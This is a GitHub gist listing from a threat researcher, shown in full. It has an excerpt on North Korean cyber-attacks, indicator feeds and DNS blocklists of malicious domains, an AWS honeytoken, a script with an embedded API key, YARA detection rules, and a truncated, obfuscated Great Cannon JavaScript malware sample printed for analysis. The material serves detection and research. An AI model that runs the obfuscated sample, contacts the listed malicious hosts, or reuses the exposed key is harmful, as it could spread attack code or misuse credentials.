Skip to content

Instantly share code, notes, and snippets.

@chrisdoman
chrisdoman / North Korean Cyber-Attacks and Collateral Damage.txt
Created January 19, 2024 19:55
North Korean Cyber-Attacks and Collateral Damage
View North Korean Cyber-Attacks and Collateral Damage.txt
North Korean Cyber-Attacks and Collateral Damage
February 15, 2018 | Chris Doman
WannaCry was incredibly destructive. The attackers made about $150,000 - but the total damage caused by WannaCry has been estimated in the billions of dollars.
There is strong evidence linking WannaCry to a group of hackers known as ‘Lazarus’, reportedly operating out of the DPRK (North Korea). Whilst WannaCry is perhaps the most famous attack by Lazarus, it isn’t the only ‘collateral damage’ caused by the DPRK’s cyber actions.
Below we disclose new details on three attacks that have spread out of control. Two likely originating from the DPRK - and one targeting the DPRK.
The Voice of Korea and the Rivts Virus
This section describes a piece of malware that may have been created within the DPRK as part of a test project - and accidentally leaked out onto the wider internet.
View cado_lambda.py
import json
import urllib3
import requests
import datetime
import random
import string
import logging
def lambda_handler(event, context):
@chrisdoman
chrisdoman / TestFeed.csv
Last active March 27, 2020 11:06
Test Feed for MISP
View TestFeed.csv
We can't make this file beautiful and searchable because it's too large.
indicator,indicator_type,pulse_title,pulse_author,tlp
ihracat.myq-see.com,hostname,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white
phantom101.duckdns.org,hostname,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white
goodattack.duckdns.org,hostname,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white
http://www.tempinfo.96.lt/wras/savekey.php,url,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white
http://www.tempinfo.96.lt/wras/createkeys.php,url,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white
http://www.tempinfo.96.lt/wras/RANSOM20.jpg,url,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white
www.tempinfo.96.lt,hostname,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white
2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326,file,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white
62d38f19e67013ce7b2a84cb17362c77e2
@chrisdoman
chrisdoman / aws_credentials_honeytoken
Created February 25, 2020 19:07
aws_credentials honeytoken
View aws_credentials_honeytoken
[default]
aws_access_key_id = AKIAXYZDQCENYTNALZP5
aws_secret_access_key = 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
output = json
region = us-east-2
* This is just a honey token to detect automated scanners looking for AWS keys - this is not a real AWS account! *
@chrisdoman
chrisdoman / otx_blocklist.rpz
Created September 17, 2019 09:47
Sample RPZ blocklist from OTX
View otx_blocklist.rpz
This file has been truncated, but you can view the full file.
differentia.ru CNAME .
*.differentia.ru CNAME .
disorderstatus.ru CNAME .
*.disorderstatus.ru CNAME .
gvaq70s7he.ru CNAME .
*.gvaq70s7he.ru CNAME .
atomictrivia.ru CNAME .
*.atomictrivia.ru CNAME .
4nbizac8.ru CNAME .
*.4nbizac8.ru CNAME .
@chrisdoman
chrisdoman / get_otx_domains_to_rpz.py
Created September 17, 2019 09:47
get_otx_domains_to_rpz.py
View get_otx_domains_to_rpz.py
# Short demonstration script to write OTX hostnames to a RPZ format text-file
from OTXv2 import OTXv2
import os
# This is the API key for the user "api_example"
otx = OTXv2('766ba1df3ab54db9c0fcbf62ef048c3a04c260e8ca65b6c25346084b7b4719ad')
events = otx.get_all_indicators(author_name='alienvault')
output = ''
View cannon.rule
rule hunt_great_cannon {
strings:
$ = "requesttime_list" nocase wide ascii
$ = "responsetime_list" nocase wide ascii
$ = "cloudflare_js_validate_url" nocase wide ascii
$ = "116.255.226.154" nocase wide ascii
$ = "responsetime-requesttime>TIMEGAP" nocase wide ascii
condition:
any of them
}
@chrisdoman
chrisdoman / cannon_samples.js
Created September 2, 2019 17:22
Samples from the Great Cannon
View cannon_samples.js
var _a="(,& vXh)C;sf<H8O1J|iRY9dj?G%m4}n_M'pQZkFyaEP=Ko2/\\x]!cquSV.57B^lW*Utr{z+N-ADg>[we0b\"I6:TL3",_b="^JL,qMP(*IjReDE<xiQYo{tp>8!-[W&hOcbv12Fn\".%4Ks=5 Z]Cl'uXfAHrdGaN/9}zg\\+U6|kSV:;wmyB7T)_03?",_c="DjOx.}S=Q's_\"I:]c[E(g/JG)k!2yY,zBV4>PFu9rp;N1i<%ZUM*?0K5^nX 8td{LAmH6hbolv&\\a7-ReCq|fw+3TW";eval(function(_,b,a,c,n,r){if(n=function(_){return(_<62?"":n(parseInt(_/62)))+((_%=62)>35?String[_a[11]+_c[40]+_b[20]+_c[66]+_b[51]+_a[6]+_b[62]+_c[40]+_b[51]+_b[20]+_c[62]+_b[12]](_+29):_[_c[61]+_c[71]+_a[56]+_c[61]+_a[68]+_a[19]+_c[57]+_b[68]](36))},0==_a[81][_a[68]+_b[12]+_b[23]+_b[52]+_b[62]+_a[53]+_c[80]](0,n)){for(;a--;)r[n(a)]=c[a];c=[function(_){return r[_]||_}],n=function(){return _c[17]+_c[27]+_b[27]+_a[22]+_a[82]+_b[33]+_c[80]+_a[73]+_a[10]+_a[55]+_c[78]+_a[70]+_a[74]+_c[78]+_a[37]+_c[15]},a=1}for(;a--;)c[a]&&(_=_[_c[40]+_a[80]+_b[23]+_b[52]+_b[62]+_a[53]+_b[12]](new RegExp(_a[49]+_a[82]+n(a)+(_b[69]+_a[82]),_a[76]),c[a]));return _}(_c[27]+_c[59]+_b[84]+_c[65]+_b[75]+_a[45]+_b[9]+_c[0]+_a[44]+_a[89]+_b[88]
View getUrlScanGreatCannonHits.py
'''
Gets possible Great Cannon injections from UrlScan
'''
import requests
import json
# Insert your urlscan API Key
api_key = ''
@chrisdoman
chrisdoman / malware.rules
Created October 1, 2018 19:20
Autogenerated Rules
View malware.rules
This file has been truncated, but you can view the full file.
/*
Yara rules to identify malware families, made by Yabin
Auto-generated - plenty of these rules won't work as they rely on looking for compiled code
*/
rule BackdoorAndroidOSCoca_51dc097980b46d053085ff079b153f107d866a27dc19670b79928ec55ab336d7 {
strings:
$a_2 = { 558bebdcdb73a5fdef349bc5b2931e67 }